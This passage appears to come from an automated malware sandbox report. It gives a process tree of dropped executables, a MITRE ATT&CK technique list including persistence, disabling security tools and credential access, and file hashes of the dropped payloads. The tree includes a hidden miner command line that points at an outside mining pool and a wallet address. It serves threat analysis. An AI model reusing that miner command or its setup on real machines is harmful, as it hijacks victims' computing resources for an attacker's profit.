                                                                                                                                                                                                                              -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:4092
                                                                                                                                                                                                                              • C:\ProgramData\Systemd\HostData.exe
                                                                                                                                                                                                                                NULL
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:3112
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\FBC2.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\FBC2.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:1832
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\FBC2.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\FBC2.exe
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:2716
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\EC6.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\EC6.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:4044
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3135.exe
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\3135.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:3472
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4ADE.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\4ADE.exe
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:2584
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7355.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7355.exe
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:1004
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7355.exe
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7355.exe
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:2452
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:3748
                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:2232
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:3296
                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:188
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:2760
                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:3392
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:3732
                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:2344
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:2264
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\614.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\614.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:6840
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\614.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\614.exe
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:6900
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\614.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\614.exe
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:6908

                                                                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                  Execution

                                                                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                  Persistence

                                                                                                                                                                                                                                                                  Winlogon Helper DLL

                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                  T1004

                                                                                                                                                                                                                                                                  Modify Existing Service

                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                  T1031

                                                                                                                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                  T1060

                                                                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                  Privilege Escalation

                                                                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                  Defense Evasion

                                                                                                                                                                                                                                                                  Modify Registry

                                                                                                                                                                                                                                                                  4
                                                                                                                                                                                                                                                                  T1112

                                                                                                                                                                                                                                                                  Disabling Security Tools

                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                  T1089

                                                                                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                  T1497

                                                                                                                                                                                                                                                                  Install Root Certificate

                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                  T1130

                                                                                                                                                                                                                                                                  Credential Access

                                                                                                                                                                                                                                                                  Credentials in Files

                                                                                                                                                                                                                                                                  3
                                                                                                                                                                                                                                                                  T1081

                                                                                                                                                                                                                                                                  Discovery

                                                                                                                                                                                                                                                                  Query Registry

                                                                                                                                                                                                                                                                  6
                                                                                                                                                                                                                                                                  T1012

                                                                                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                  T1497

                                                                                                                                                                                                                                                                  System Information Discovery

                                                                                                                                                                                                                                                                  6
                                                                                                                                                                                                                                                                  T1082

                                                                                                                                                                                                                                                                  Peripheral Device Discovery

                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                  T1120

                                                                                                                                                                                                                                                                  Remote System Discovery

                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                  T1018

                                                                                                                                                                                                                                                                  Collection

                                                                                                                                                                                                                                                                  Data from Local System

                                                                                                                                                                                                                                                                  3
                                                                                                                                                                                                                                                                  T1005

                                                                                                                                                                                                                                                                  Command and Control

                                                                                                                                                                                                                                                                  Web Service

                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                  T1102

                                                                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\libcurl.dll
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\libcurlpp.dll
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\libstdc++-6.dll
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\libwinpthread-1.dll
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\setup_install.exe
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\setup_install.exe
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\sonia_1.exe
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\sonia_1.exe
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\sonia_1.txt
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\sonia_2.exe
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\sonia_2.txt
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\sonia_3.exe
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\sonia_3.txt
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\sonia_4.exe
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\sonia_4.txt
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\sonia_5.exe
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\sonia_5.txt
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\sonia_6.exe
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\sonia_6.txt
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    1c7be730bdc4833afb7117d48c3fd513

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    74231678f536a19b3016840f56b845c7

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    74231678f536a19b3016840f56b845c7

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                                                                                                                  • \Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\libcurl.dll
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                                                  • \Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\libcurlpp.dll
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                                                                  • \Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                                                                  • \Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\libstdc++-6.dll
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                                                                  • \Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\libwinpthread-1.dll
                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                                                                  • \Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\setup_install.exe
                                                                                                                                                                                                                                                                    MD5

